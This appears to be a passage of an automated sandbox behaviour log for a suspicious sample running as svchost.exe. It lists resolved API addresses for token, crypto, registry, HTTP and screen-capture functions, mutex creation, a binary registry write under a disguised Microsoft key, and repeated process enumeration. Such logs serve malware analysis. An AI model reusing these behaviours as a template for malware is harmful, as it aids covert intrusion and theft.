| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x756f40e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x756f0e24 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x756f2a66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x756f40fe |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x756ec54a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x756e9fe2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x756ef4fd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x756edf4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x756edf36 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x756f4680 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x756f14d6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x756edf66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x756f4304 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x756f412e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x756f4620 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x756f468d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x756ec532 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x756f1f59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x756f432c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x756f46ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x756ee124 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x756f431c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x756ec51a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x756f418e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x756f415e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x756f4608 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x756f41b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x756f413b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x756ecf31 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7570773f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x756ee15b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x756f46e7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x756f445b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7573db3a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x756edf14 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75c63c71 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75c71e46 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75cd5708 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x750e45bf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x750e55bf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x7510cd81 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x750e4745 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x7510d32a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x750e46e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x750e86f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x750ec39c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x750e3248 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x750ec177 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x7511066c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x750e5331 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x750ffbf5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x750ea1b9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x750dfcca |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x750fedfe |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x750dff07 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x750e5c62 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x750fc6fb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x7510ce21 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x74eb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x74eb13f0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x7546e599 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x754909ad |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x7547363b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75465ea5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75499d0b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x754986d3 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x75145689 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75144de0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7514e743 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x751454f4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x75144f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x75145f49 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x75145ea6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x751458b3 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x753749e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x7536b406 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x7536a33e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75361b56 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75374c7d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x7535d075 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x753675e8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x7537f18e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7536ab49 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x753e18f8 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76c40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x76c71d76 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x76b60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b63eae |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x748e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x74dea415 |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Module | Get Filename | process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = 20BC29E135FB9B01285187E3B5593CC8 |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\xeyzlap, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\giilemz, type = file_attributes |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77270000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x7728fda0 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
